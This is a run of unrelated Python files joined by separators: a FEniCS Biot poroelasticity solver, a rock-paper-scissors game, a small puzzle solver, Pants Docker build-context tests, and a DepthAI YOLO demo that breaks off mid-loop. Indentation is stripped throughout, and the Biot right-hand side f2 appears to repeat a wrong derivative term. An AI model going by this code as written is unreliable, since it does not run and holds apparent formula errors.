# <editor-fold desc="Parameters">
dim = 2 # spatial dimension
eps = 10.0E-6 # error tolerance
T_final = 1.0 # final time
number_of_steps = 10 # number of steps
dt = T_final / number_of_steps # time step
alpha = 1.0 # Biot's coeff
E = 1.0 # bulk modulus
nu = 0.25 # Poisson ratio \in (0, 0.5)
M = 1.0 # Biot modulus
K = 1.0 # permeability divided by fluid viscosity
lambd = 3.0*E*nu/(nu + 1.0) # Lame param 1
mu = 3.0*E*(1.0 - 2.0*nu)/2.0/(nu + 1.0) # Lame param 2
betaFS = alpha**2/2.0/(2.0*mu/dim + lambd) # tuning param
# </editor-fold>
# <editor-fold desc="Exact solutions and RHS">
# Define variables used by sympy
x, y, t = sy.symbols('x[0], x[1], t')
# Exact solutions
pressure = t*x*(1.0 - x)*y*(1.0 - y) # pressure
u1 = t*x*(1.0 - x)*y*(1.0 - y) # displacement comp 1
u2 = t*x*(1.0 - x)*y*(1.0 - y) # displacement comp 2
px = sy.diff(pressure, x)
py = sy.diff(pressure, y)
w1 = - K*px # flux comp 1
w2 = - K*py # flux comp 2
# partial derivatives
u1x = sy.diff(u1, x)
u1y = sy.diff(u1, y)
u1xx = sy.diff(u1, x, x)
u1yy = sy.diff(u1, y, y)
u1xy = sy.diff(u1, x, y)
u2x = sy.diff(u2, x)
u2y = sy.diff(u2, y)
u2xx = sy.diff(u2, x, x)
u2yy = sy.diff(u2, y, y)
u2xy = sy.diff(u2, x, y)
w1x = sy.diff(w1, x)
w2y = sy.diff(w2, y)
# right hand sides
Sf = sy.diff(1.0/M*pressure + alpha*(u1x + u2y), t) + w1x + w2y
f1 = - 2.0*mu*(u1xx + 0.5*(u2xy + u1yy)) - lambd*u1xx + alpha*px
f2 = - 2.0*mu*(u2yy + 0.5*(u1xy + u2yy)) - lambd*u2yy + alpha*py
# simplify expressions
pressure = sy.simplify(pressure)
u1 = sy.simplify(u1)
u2 = sy.simplify(u2)
w1 = sy.simplify(w1)
w2 = sy.simplify(w2)
Sf = sy.simplify(Sf)
f1 = sy.simplify(f1)
f2 = sy.simplify(f2)
# convert expressions to C++ syntax
p_code = sy.printing.ccode(pressure)
u1_code = sy.printing.ccode(u1)
u2_code = sy.printing.ccode(u2)
w1_code = sy.printing.ccode(w1)
w2_code = sy.printing.ccode(w2)
Sf_code = sy.printing.ccode(Sf)
f1_code = sy.printing.ccode(f1)
f2_code = sy.printing.ccode(f2)
# print the exact solutions and RHS
print """ Exact solutions as ccode:
p = \t %r
u1 = \t %r
u2 = \t %r
w1 = \t %r
w2 = \t %r
Sf = \t %r
f1 = \t %r
f2 = \t %r
""" % (p_code, u1_code, u2_code, w1_code, w2_code, Sf_code, f1_code, f2_code)
# </editor-fold>
# <editor-fold desc="Mesh and function spaces">
# generate unit square mesh
mesh = UnitSquareMesh(64, 64)
mesh_size = mesh.hmax()
# define function spaces
U = VectorFunctionSpace(mesh, 'P', 1) # space for displacement
P_elem = FiniteElement('DG', mesh.ufl_cell(), 0) # element for pressure
W_elem = FiniteElement('RT', mesh.ufl_cell(), 1) # element for flux
WP_elem = W_elem * P_elem # mixed element for flux and pressure
WP = FunctionSpace(mesh, WP_elem) # mixed space for flux and pressure
# exact solutions and RHS
w_ex = Expression((w1_code, w2_code), degree=5, t=0)
p_ex = Expression(p_code, degree=5, t=0)
u_ex = Expression((u1_code, u2_code), degree=5, t=0)
Sf = Expression(Sf_code, degree=1, t=0)
f = Expression((f1_code, f2_code), degree=1, t=0)
# </editor-fold>
# <editor-fold desc="BC and IC">
# Define boundary points
def boundary(x, on_boundary):
return on_boundary
# Dirichlet BC for displacement and pressure
bc_u = DirichletBC(U, u_ex, boundary)
bc_wp = DirichletBC(WP.sub(1), p_ex, boundary)
# trial and test functions
u = TrialFunction(U)
v = TestFunction(U)
w, p = TrialFunctions(WP)
z, q = TestFunctions(WP)
# initial conditions (homogenous) and previous time-step/iteration
u_n = Function(U)
u_ = Function(U)
wp_n = Function(WP)
wp_ = Function(WP)
w_n, p_n = split(wp_n)
w_, p_ = split(wp_)
# </editor-fold>
# <editor-fold desc="Variational form">
# define symmetric gradient
def epsilon(u):
return sym(nabla_grad(u))
# Constants for use in var form
dt = Constant(dt)
alpha = Constant(alpha)
M = Constant(M)
K = Constant(K)
g = Constant((0.0, 0.0)) # gravitational force
lambd = Constant(lambd)
mu = Constant(mu)
betaFS = Constant(betaFS)
rho_f = Constant(1.0) # fluid density
# define var problem for step 1 (pressure and flux)
a1 = (1/M + betaFS)*p*q*dx + dt*div(w)*q*dx + 1/K*dot(w, z)*dx - p*div(z)*dx
L1 = dt*Sf*q*dx + 1/M*p_n*q*dx + alpha*div(u_n)*q*dx \
+ betaFS*p_*q*dx - alpha*div(u_)*q*dx + rho_f*dot(g, z)*dx
# define var problem for step 2 (displacement)
a2 = 2*mu*inner(epsilon(u), epsilon(v))*dx + lambd*div(u)*div(v)*dx
L2 = dot(f, v)*dx + alpha*p_*div(v)*dx
# Define solutions
u = Function(U)
wp = Function(WP)
# </editor-fold>
# Create VTK file for saving solution, .pvd or .xdmf
vtkfile_w = File('Biot_FSSM/flux.pvd')
vtkfile_p = File('Biot_FSSM/pressure.pvd')
vtkfile_u = File('Biot_FSSM/displacement.pvd')
# initialize time
time = 0.0
# start computation
for i in range(number_of_steps):
# update time
time += float(dt)
u_ex.t = time
w_ex.t = time
p_ex.t = time
Sf.t = time
f.t = time
# do iterations
for j in range(10):
# step 1
solve(a1 == L1, wp, bc_wp)
_w_, _p_ = wp.split()
wp_.assign(wp) # update previous iteration
# step 2
solve(a2 == L2, u, bc_u)
u_.assign(u) # update previous iteration
# update previous time step
wp_n.assign(wp)
u_n.assign(u)
# <editor-fold desc="Compute and print errors">
# Compute errors in L2 norm
flux_error_L2 = errornorm(w_ex, _w_, 'L2')
pressure_error_L2 = errornorm(p_ex, _p_, 'L2')
displacement_error_L2 = errornorm(u_ex, u, 'L2')
# interpolate exact solutions at current step
w_e = interpolate(w_ex, WP.sub(0).collapse())
p_e = interpolate(p_ex, WP.sub(1).collapse())
u_e = interpolate(u_ex, U)
# Compute maximum error at vertices
vertex_values_w_e = w_e.compute_vertex_values(mesh)
vertex_values_w = _w_.compute_vertex_values(mesh)
flux_error_max = np.max(np.abs(vertex_values_w_e - vertex_values_w))
vertex_values_u_e = u_e.compute_vertex_values(mesh)
vertex_values_u = u.compute_vertex_values(mesh)
displacement_error_max = np.max(np.abs(vertex_values_u_e - vertex_values_u))
vertex_values_p_e = p_e.compute_vertex_values(mesh)
vertex_values_p = _p_.compute_vertex_values(mesh)
pressure_error_max = np.max(np.abs(vertex_values_p_e - vertex_values_p))
# print errors
print """ \n Errors in L2 and max norm: \n
\t flux error in L2-norm: \t \t %r
\t flux error in max-norm: \t \t %r \n
\t pressure error in L2-norm: \t \t %r
\t pressure error in max-norm: \t \t %r \n
\t displacement error in L2-norm: \t %r
\t displacement error in max-norm: \t %r
""" % (flux_error_L2, flux_error_max, pressure_error_L2,
pressure_error_max, displacement_error_L2, displacement_error_max)
# </editor-fold>
# save to file
vtkfile_w << _w_, time
vtkfile_u << u, time
vtkfile_p << _p_, time
# print value of parameters
print """ Parameters: \n
\t time step: \t %r
\t final time: \t %r
\t lambda: \t %r
\t mu: \t \t %r
\t betaFS: \t %r \n """ % (float(dt), float(time), float(lambd), float(mu), float(betaFS))
# print mesh size
print """ Mesh size: \n
\t %r
""" % mesh_size
|
#Works doesnt check for alt.input no game loop or score
v_i = ['r', 'p', 's']
import random
player_move = "get the move!"
print("RPS!")
def get_input():
global player_move
player_move = input("Throw: \n")
if player_move.lower() in v_i:
judgement()
else:
print("Bad input")
get_input()
def judgement():
global player_move
computer_move = random.choice(v_i)
print('player picked ' + player_move)
print('computer picked ' + computer_move)
if computer_move == player_move:
print('tie')
elif computer_move == 'r' and player_move == 'p':
print('you win p beats r')
elif computer_move == 'r' and player_move == 's':
print('you loose r beat s')
elif computer_move == 'p' and player_move == 'r':
print('you loose p beat r')
elif computer_move == 'p' and player_move == 's':
print('you win s beat p')
elif computer_move == 's' and player_move == 'r':
print('you win r beat s')
elif computer_move == 's' and player_move == 'p':
print('you loose s beat p')
get_input()
|
from datetime import datetime
def solve(n):
(x0, y0, x1, y1) = n
sx = x1 + (x1 - x0)
sy = y1 + (y1 - y0)
return "{0} {1}".format(sx, sy)
if __name__ == '__main__':
'''
T = int(input()) # number of test cases
tests = []
for i in range(T):
N = input() # number of cycles in test scenario
tests.append(map(int,N.split()))
'''
tests = [
[0, 0, 1, 1],
[1, 1, 2, 1]
]
start_time = datetime.now()
for i in tests:
print(solve(i))
time_taken = datetime.now() - start_time
print("--->\tAll Time taken: {0}".format(time_taken)) |
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import json
import os
import zipfile
from textwrap import dedent
from typing import Any, ContextManager
import pytest
from pants.backend.docker.goals import package_image
from pants.backend.docker.subsystems import dockerfile_parser
from pants.backend.docker.subsystems.dockerfile_parser import DockerfileInfo
from pants.backend.docker.target_types import DockerImageTarget
from pants.backend.docker.util_rules import (
dependencies,
docker_binary,
docker_build_args,
docker_build_context,
docker_build_env,
dockerfile,
)
from pants.backend.docker.util_rules.docker_build_args import DockerBuildArgs
from pants.backend.docker.util_rules.docker_build_context import (
DockerBuildContext,
DockerBuildContextRequest,
)
from pants.backend.docker.util_rules.docker_build_env import DockerBuildEnvironment
from pants.backend.docker.value_interpolation import DockerBuildArgsInterpolationValue
from pants.backend.python import target_types_rules
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.goals.package_pex_binary import PexBinaryFieldSet
from pants.backend.python.target_types import PexBinary, PythonRequirementTarget
from pants.backend.python.util_rules import pex_from_targets
from pants.backend.shell.target_types import ShellSourcesGeneratorTarget, ShellSourceTarget
from pants.backend.shell.target_types import rules as shell_target_types_rules
from pants.core.goals import package
from pants.core.goals.package import BuiltPackage
from pants.core.target_types import FilesGeneratorTarget
from pants.core.target_types import rules as core_target_types_rules
from pants.core.util_rules.environments import DockerEnvironmentTarget
from pants.engine.addresses import Address
from pants.engine.fs import EMPTY_DIGEST, EMPTY_SNAPSHOT, Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.testutil.pytest_util import no_exception
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.value_interpolation import InterpolationContext, InterpolationValue
def create_rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*core_target_types_rules(),
*dependencies.rules(),
*docker_binary.rules(),
*docker_build_args.rules(),
*docker_build_context.rules(),
*docker_build_env.rules(),
*dockerfile.rules(),
*dockerfile_parser.rules(),
*package_image.rules(),
*package_pex_binary.rules(),
*pex_from_targets.rules(),
*shell_target_types_rules(),
*target_types_rules.rules(),
package.environment_aware_package,
package.find_all_packageable_targets,
QueryRule(BuiltPackage, [PexBinaryFieldSet]),
QueryRule(DockerBuildContext, (DockerBuildContextRequest,)),
],
target_types=[
PythonRequirementTarget,
DockerEnvironmentTarget,
DockerImageTarget,
FilesGeneratorTarget,
PexBinary,
ShellSourcesGeneratorTarget,
ShellSourceTarget,
],
)
return rule_runner
@pytest.fixture
def rule_runner() -> RuleRunner:
return create_rule_runner()
def assert_build_context(
rule_runner: RuleRunner,
address: Address,
*,
build_upstream_images: bool = False,
expected_files: list[str],
expected_interpolation_context: dict[str, str | dict[str, str] | InterpolationValue]
| None = None,
expected_num_upstream_images: int = 0,
pants_args: list[str] | None = None,
runner_options: dict[str, Any] | None = None,
) -> DockerBuildContext:
if runner_options is None:
runner_options = {}
runner_options.setdefault("env_inherit", set()).update({"PATH", "PYENV_ROOT", "HOME"})
rule_runner.set_options(pants_args or [], **runner_options)
context = rule_runner.request(
DockerBuildContext,
[
DockerBuildContextRequest(
address=address,
build_upstream_images=build_upstream_images,
)
],
)
snapshot = rule_runner.request(Snapshot, [context.digest])
assert sorted(expected_files) == sorted(snapshot.files)
if expected_interpolation_context is not None:
build_args = expected_interpolation_context.get("build_args")
if isinstance(build_args, dict):
expected_interpolation_context["build_args"] = DockerBuildArgsInterpolationValue(
build_args
)
if "pants" not in expected_interpolation_context:
expected_interpolation_context["pants"] = context.interpolation_context["pants"]
# Converting to `dict` to avoid the fact that FrozenDict is sensitive to the order of the keys.
assert dict(context.interpolation_context) == dict(
InterpolationContext.from_dict(expected_interpolation_context)
)
if build_upstream_images:
assert len(context.upstream_image_ids) == expected_num_upstream_images
return context
def test_pants_hash(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"test/BUILD": "docker_image()",
"test/Dockerfile": "FROM base",
}
)
assert_build_context(
rule_runner,
Address("test"),
expected_files=["test/Dockerfile"],
expected_interpolation_context={
"tags": {
"baseimage": "latest",
"stage0": "latest",
},
"build_args": {},
"pants": {"hash": "87e90685c07ac302bbff8f9d846b4015621255f741008485fd3ce72253ce54f4"},
},
)
def test_file_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
# img_A -> files_A
# img_A -> img_B
"src/a/BUILD": dedent(
"""\
docker_image(name="img_A", dependencies=[":files_A", "src/b:img_B"])
files(name="files_A", sources=["files/**"])
"""
),
"src/a/Dockerfile": "FROM base",
"src/a/files/a01": "",
"src/a/files/a02": "",
# img_B -> files_B
"src/b/BUILD": dedent(
"""\
docker_image(name="img_B", dependencies=[":files_B"])
files(name="files_B", sources=["files/**"])
"""
),
"src/b/Dockerfile": "FROM base",
"src/b/files/b01": "",
"src/b/files/b02": "",
# Mixed
"src/c/BUILD": dedent(
"""\
docker_image(name="img_C", dependencies=["src/a:files_A", "src/b:files_B"])
"""
),
"src/c/Dockerfile": "FROM base",
}
)
# We want files_B in build context for img_B
assert_build_context(
rule_runner,
Address("src/b", target_name="img_B"),
expected_files=["src/b/Dockerfile", "src/b/files/b01", "src/b/files/b02"],
)
# We want files_A in build context for img_A, but not files_B
assert_build_context(
rule_runner,
Address("src/a", target_name="img_A"),
expected_files=["src/a/Dockerfile", "src/a/files/a01", "src/a/files/a02"],
)
# Mixed.
assert_build_context(
rule_runner,
Address("src/c", target_name="img_C"),
expected_files=[
"src/c/Dockerfile",
"src/a/files/a01",
"src/a/files/a02",
"src/b/files/b01",
"src/b/files/b02",
],
)
def test_from_image_build_arg_dependency(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/upstream/BUILD": dedent(
"""\
docker_image(
name="image",
repository="upstream/{name}",
image_tags=["1.0"],
instructions=["FROM alpine:3.16.1"],
)
"""
),
"src/downstream/BUILD": "docker_image(name='image')",
"src/downstream/Dockerfile": dedent(
"""\
ARG BASE_IMAGE=src/upstream:image
FROM $BASE_IMAGE
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/downstream", target_name="image"),
expected_files=["src/downstream/Dockerfile", "src.upstream/image.docker-info.json"],
build_upstream_images=True,
expected_interpolation_context={
"tags": {
"baseimage": "1.0",
"stage0": "1.0",
},
"build_args": {
"BASE_IMAGE": "upstream/image:1.0",
},
},
expected_num_upstream_images=1,
)
def test_from_image_build_arg_dependency_overwritten(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/upstream/BUILD": dedent(
"""\
docker_image(
name="image",
repository="upstream/{name}",
image_tags=["1.0"],
instructions=["FROM alpine:3.16.1"],
)
"""
),
"src/downstream/BUILD": "docker_image(name='image')",
"src/downstream/Dockerfile": dedent(
"""\
ARG BASE_IMAGE=src/upstream:image
FROM $BASE_IMAGE
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/downstream", target_name="image"),
expected_files=["src/downstream/Dockerfile"],
build_upstream_images=True,
expected_interpolation_context={
"tags": {
"baseimage": "3.10-slim",
"stage0": "3.10-slim",
},
"build_args": {
"BASE_IMAGE": "python:3.10-slim",
},
},
expected_num_upstream_images=0,
pants_args=["--docker-build-args=BASE_IMAGE=python:3.10-slim"],
)
def test_from_image_build_arg_not_in_repo_issue_15585(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"test/image/BUILD": "docker_image()",
"test/image/Dockerfile": dedent(
"""\
ARG PYTHON_VERSION="python:3.10.2-slim"
FROM $PYTHON_VERSION
"""
),
}
)
assert_build_context(
rule_runner,
Address("test/image", target_name="image"),
expected_files=["test/image/Dockerfile"],
build_upstream_images=True,
expected_interpolation_context={
"tags": {
"baseimage": "3.10.2-slim",
"stage0": "3.10.2-slim",
},
# PYTHON_VERSION will be treated like any other build ARG.
"build_args": {},
},
)
def test_files_out_of_tree(rule_runner: RuleRunner) -> None:
# src/a:img_A -> res/static:files
rule_runner.write_files(
{
"src/a/BUILD": dedent(
"""\
docker_image(name="img_A", dependencies=["res/static:files"])
"""
),
"res/static/BUILD": dedent(
"""\
files(name="files", sources=["!BUILD", "**/*"])
"""
),
"src/a/Dockerfile": "FROM base",
"res/static/s01": "",
"res/static/s02": "",
"res/static/sub/s03": "",
}
)
assert_build_context(
rule_runner,
Address("src/a", target_name="img_A"),
expected_files=[
"src/a/Dockerfile",
"res/static/s01",
"res/static/s02",
"res/static/sub/s03",
],
)
def test_packaged_pex_path(rule_runner: RuleRunner) -> None:
# This test is here to ensure that we catch if there is any change in the generated path where
# built pex binaries go, as we rely on that for dependency inference in the Dockerfile.
rule_runner.write_files(
{
"src/docker/BUILD": """docker_image(dependencies=["src/python/proj/cli:bin"])""",
"src/docker/Dockerfile": """FROM python:3.8""",
"src/python/proj/cli/BUILD": """pex_binary(name="bin", entry_point="main.py")""",
"src/python/proj/cli/main.py": """print("cli main")""",
}
)
assert_build_context(
rule_runner,
Address("src/docker", target_name="docker"),
expected_files=["src/docker/Dockerfile", "src.python.proj.cli/bin.pex"],
)
def test_packaged_pex_environment(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"BUILD": dedent(
"""
docker_environment(
name="python_38",
image="python:3.8-buster@sha256:bc4b9fb034a871b285bea5418cedfcaa9d2ab5590fb5fb6f0c42aaebb2e2c911",
platform="linux_x86_64",
python_bootstrap_search_path=["<PATH>"],
)
python_requirement(name="psutil", requirements=["psutil==5.9.2"])
"""
),
"src/docker/BUILD": """docker_image(dependencies=["src/python/proj/cli:bin"])""",
"src/docker/Dockerfile": """FROM python:3.8""",
"src/python/proj/cli/BUILD": dedent(
"""
pex_binary(
name="bin",
entry_point="main.py",
environment="python_38",
dependencies=["//:psutil"],
)
"""
),
"src/python/proj/cli/main.py": """import psutil; assert psutil.Process.is_running()""",
}
)
pex_file = "src.python.proj.cli/bin.pex"
context = assert_build_context(
rule_runner,
Address("src/docker", target_name="docker"),
pants_args=["--environments-preview-names={'python_38': '//:python_38'}"],
expected_files=["src/docker/Dockerfile", pex_file],
)
# Confirm that the context contains a PEX for the appropriate platform.
rule_runner.write_digest(context.digest, path_prefix="contents")
with zipfile.ZipFile(os.path.join(rule_runner.build_root, "contents", pex_file), "r") as zf:
assert json.loads(zf.read("PEX-INFO"))["distributions"].keys() == {
"psutil-5.9.2-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl",
"psutil-5.9.2-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl",
}
def test_interpolation_context_from_dockerfile(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/docker/BUILD": "docker_image()",
"src/docker/Dockerfile": dedent(
"""\
FROM python:3.8
FROM alpine:3.16.1 as interim
FROM interim
FROM scratch:1-1 as output
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=["src/docker/Dockerfile"],
expected_interpolation_context={
"tags": {
"baseimage": "3.8",
"stage0": "3.8",
"interim": "3.16.1",
"stage2": "latest",
"output": "1-1",
},
"build_args": {},
},
)
def test_synthetic_dockerfile(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/docker/BUILD": dedent(
"""\
docker_image(
instructions=[
"FROM python:3.8",
"FROM alpine:3.16.1 as interim",
"FROM interim",
"FROM scratch:1-1 as output",
]
)
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=["src/docker/Dockerfile.docker"],
expected_interpolation_context={
"tags": {
"baseimage": "3.8",
"stage0": "3.8",
"interim": "3.16.1",
"stage2": "latest",
"output": "1-1",
},
"build_args": {},
},
)
def test_shell_source_dependencies(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/docker/BUILD": dedent(
"""\
docker_image(dependencies=[":entrypoint", ":shell"])
shell_source(name="entrypoint", source="entrypoint.sh")
shell_sources(name="shell", sources=["scripts/**/*.sh"])
"""
),
"src/docker/Dockerfile": "FROM base",
"src/docker/entrypoint.sh": "",
"src/docker/scripts/s01.sh": "",
"src/docker/scripts/s02.sh": "",
"src/docker/scripts/random.file": "",
}
)
assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=[
"src/docker/Dockerfile",
"src/docker/entrypoint.sh",
"src/docker/scripts/s01.sh",
"src/docker/scripts/s02.sh",
],
)
def test_build_arg_defaults_from_dockerfile(rule_runner: RuleRunner) -> None:
# Test that only explicitly defined build args in the BUILD file or pants configuration use the
# environment for its values.
rule_runner.write_files(
{
"src/docker/BUILD": dedent(
"""\
docker_image(
extra_build_args=[
"base_version",
]
)
"""
),
"src/docker/Dockerfile": dedent(
"""\
ARG base_name=python
ARG base_version=3.8
FROM ${base_name}:${base_version}
ARG NO_DEF
ENV opt=${NO_DEF}
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/docker"),
runner_options={
"env": {
"base_name": "no-effect",
"base_version": "3.9",
},
},
expected_files=["src/docker/Dockerfile"],
expected_interpolation_context={
"tags": {
"baseimage": "${base_version}",
"stage0": "${base_version}",
},
"build_args": {
# `base_name` is not listed here, as it was not an explicitly defined build arg.
"base_version": "3.9",
},
},
)
@pytest.mark.parametrize(
"dockerfile_arg_value, extra_build_arg_value, expect",
[
pytest.param(None, None, no_exception(), id="No args defined"),
pytest.param(
None,
"",
pytest.raises(ExecutionError, match=r"variable 'MY_ARG' is undefined"),
id="No default value for build arg",
),
pytest.param(None, "some default value", no_exception(), id="Default value for build arg"),
pytest.param("", None, no_exception(), id="No build arg defined, and ARG without default"),
pytest.param(
"",
"",
pytest.raises(ExecutionError, match=r"variable 'MY_ARG' is undefined"),
id="No default value from ARG",
),
pytest.param(
"", "some default value", no_exception(), id="Default value for build arg, ARG present"
),
pytest.param(
"some default value", None, no_exception(), id="No build arg defined, only ARG"
),
pytest.param("some default value", "", no_exception(), id="Default value from ARG"),
pytest.param(
"some default value",
"some other default",
no_exception(),
id="Default value for build arg, ARG default",
),
],
)
def test_undefined_env_var_behavior(
rule_runner: RuleRunner,
dockerfile_arg_value: str | None,
extra_build_arg_value: str | None,
expect: ContextManager,
) -> None:
dockerfile_arg = ""
if dockerfile_arg_value is not None:
dockerfile_arg = "ARG MY_ARG"
if dockerfile_arg_value:
dockerfile_arg += f"={dockerfile_arg_value}"
extra_build_args = ""
if extra_build_arg_value is not None:
extra_build_args = 'extra_build_args=["MY_ARG'
if extra_build_arg_value:
extra_build_args += f"={extra_build_arg_value}"
extra_build_args += '"],'
rule_runner.write_files(
{
"src/docker/BUILD": dedent(
f"""\
docker_image(
{extra_build_args}
)
"""
),
"src/docker/Dockerfile": dedent(
f"""\
FROM python:3.8
{dockerfile_arg}
"""
),
}
)
with expect:
assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=["src/docker/Dockerfile"],
)
@pytest.fixture(scope="session")
def build_context() -> DockerBuildContext:
rule_runner = create_rule_runner()
rule_runner.write_files(
{
"src/docker/BUILD": dedent(
"""\
docker_image(
extra_build_args=["DEF_ARG"],
instructions=[
"FROM python:3.8",
"ARG MY_ARG",
"ARG DEF_ARG=some-value",
],
)
"""
),
}
)
return assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=["src/docker/Dockerfile.docker"],
)
@pytest.mark.parametrize(
"fmt_string, result, expectation",
[
pytest.param(
"{build_args.MY_ARG}",
None,
pytest.raises(
ValueError,
match=(r"The build arg 'MY_ARG' is undefined\. Defined build args are: DEF_ARG\."),
),
id="ARG_NAME",
),
pytest.param(
"{build_args.DEF_ARG}",
"some-value",
no_exception(),
id="DEF_ARG",
),
],
)
def test_build_arg_behavior(
build_context: DockerBuildContext,
fmt_string: str,
result: str | None,
expectation: ContextManager,
) -> None:
with expectation:
assert fmt_string.format(**build_context.interpolation_context) == result
def test_create_docker_build_context() -> None:
context = DockerBuildContext.create(
build_args=DockerBuildArgs.from_strings("ARGNAME=value1"),
snapshot=EMPTY_SNAPSHOT,
build_env=DockerBuildEnvironment.create({"ENVNAME": "value2"}),
upstream_image_ids=["def", "abc"],
dockerfile_info=DockerfileInfo(
address=Address("test"),
digest=EMPTY_DIGEST,
source="test/Dockerfile",
build_args=DockerBuildArgs.from_strings(),
copy_source_paths=(),
from_image_build_args=DockerBuildArgs.from_strings(),
version_tags=("base latest", "stage1 1.2", "dev 2.0", "prod 2.0"),
),
)
assert list(context.build_args) == ["ARGNAME=value1"]
assert dict(context.build_env.environment) == {"ENVNAME": "value2"}
assert context.upstream_image_ids == ("abc", "def")
assert context.dockerfile == "test/Dockerfile"
assert context.stages == ("base", "dev", "prod")
def test_pex_custom_output_path_issue14031(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"project/test/BUILD": dedent(
"""\
pex_binary(
name="test",
entry_point="main.py",
output_path="project/test.pex",
)
docker_image(
name="test-image",
dependencies=[":test"],
)
"""
),
"project/test/main.py": "print('Hello')",
"project/test/Dockerfile": dedent(
"""\
FROM python:3.8
COPY project/test.pex .
CMD ["./test.pex"]
"""
),
}
)
assert_build_context(
rule_runner,
Address("project/test", target_name="test-image"),
expected_files=["project/test/Dockerfile", "project/test.pex"],
)
def test_dockerfile_instructions_issue_17571(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/docker/Dockerfile": "do not use this file",
"src/docker/BUILD": dedent(
"""\
docker_image(
source=None,
instructions=[
"FROM python:3.8",
]
)
"""
),
}
)
assert_build_context(
rule_runner,
Address("src/docker"),
expected_files=["src/docker/Dockerfile.docker"],
expected_interpolation_context={
"tags": {
"baseimage": "3.8",
"stage0": "3.8",
},
"build_args": {},
},
)
|
#!/usr/bin/env python3
from pathlib import Path
import sys
import cv2
import depthai as dai
import numpy as np
import time
'''
Yolo-v3 device side decoding demo
YOLO v3 is a real-time object detection model implemented with Keras* from
this repository <https://github.com/david8862/keras-YOLOv3-model-set> and converted
to TensorFlow* framework. This model was pretrained on COCO* dataset with 80 classes.
'''
# https://github.com/david8862/keras-YOLOv3-model-set/blob/master/configs/coco2017_origin_classes.txt
labelMap = ["Fresh", "Rotten"]
syncNN = True
# Gen1 API: python3 depthai_demo.py -cnn yolo-v3 -sh 13
# pipeline.setOpenVINOVersion(version = dai.OpenVINO.Version.VERSION_2020_1)
yolo_v3_path = str((Path(__file__).parent / Path(
'models/OpenVINO_2021_2/fresh_rotten_yolov4_openvino_2021.2_6shave.blob')).resolve().absolute())
if len(sys.argv) > 1:
yolo_v3_path = sys.argv[1]
# Start defining a pipeline
pipeline = dai.Pipeline()
# Define a source - color camera
cam = pipeline.createColorCamera()
cam.setPreviewSize(416, 416)
cam.setInterleaved(False)
cam.setFps(10)
# Create a "Yolo" detection network
nn = pipeline.createYoloDetectionNetwork()
nn.setConfidenceThreshold(0.7)
nn.setNumClasses(2)
nn.setCoordinateSize(4)
# https://github.com/david8862/keras-YOLOv3-model-set/blob/master/cfg/yolov3.cfg
# https://github.com/david8862/keras-YOLOv3-model-set/blob/master/configs/yolo3_anchors.txt
# Set Yolo anchors
anchors = np.array([10,13, 16,30, 33,23, 30,61, 62,45, 59,119, 116,90, 156,198, 373,326])
nn.setAnchors(anchors)
anchorMasks52 = np.array([0,1,2])
anchorMasks26 = np.array([3,4,5])
anchorMasks13 = np.array([6,7,8])
anchorMasks = {
"side52": anchorMasks52,
"side26": anchorMasks26,
"side13": anchorMasks13,
}
nn.setAnchorMasks(anchorMasks)
nn.setIouThreshold(0.5)
nn.setBlobPath(yolo_v3_path)
# Recommended configuration for best inference throughput. Compile blob file for
# have the number of available shaves and run two inference threads.
nn.setNumInferenceThreads(2)
nn.input.setBlocking(False)
# Set Queue size to 1 to minimize latency
nn.input.setQueueSize(1)
cam.preview.link(nn.input)
# Create outputs
xout_rgb = pipeline.createXLinkOut()
xout_rgb.setStreamName("rgb")
if(syncNN):
nn.passthrough.link(xout_rgb.input)
else:
cam.preview.link(xout_rgb.input)
xoutNN = pipeline.createXLinkOut()
xoutNN.setStreamName("detections")
nn.out.link(xoutNN.input)
# Pipeline defined, now the device is connected to
with dai.Device(pipeline) as device:
# Start pipeline
device.startPipeline()
# Output queues will be used to get the rgb frames and nn data from the outputs defined above
qRgb = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
qDet = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
frame = None
bboxes = []
start_time = time.time()
counter = 0
fps = 0
while True:
if(syncNN):
inRgb = qRgb.get()
inDet = qDet.get()
else:
inRgb = qRgb.tryGet()
inDet = qDet.tryGet()
if inRgb is not None:
frame = inRgb.getCvFrame()
if inDet is not None:
bboxes = inDet.detections
counter+=1
current_time = time.time()
if (current_time - start_time) > 1 :
fps = counter / (current_time - start_time)
counter = 0
start_time = current_time
if frame is not None:
# if the frame is available, draw bounding boxes on it and show the frame
height = frame.shape[0]
width = frame.shape[1]
for bbox in bboxes:
#denormalize bounging box
x1 = int(bbox.xmin * width)
x2 = int(bbox.xmax * width)
y1 = int(bbox.ymin * height)
y2 = int(bbox.ymax * height)
try:
label = labelMap[bbox.label]
except:
label = bbox.label
# Annotation data
BOX_COLOR = (0,255,0)
LABEL_BG_COLOR = (70, 120, 70) # greyish green background for text
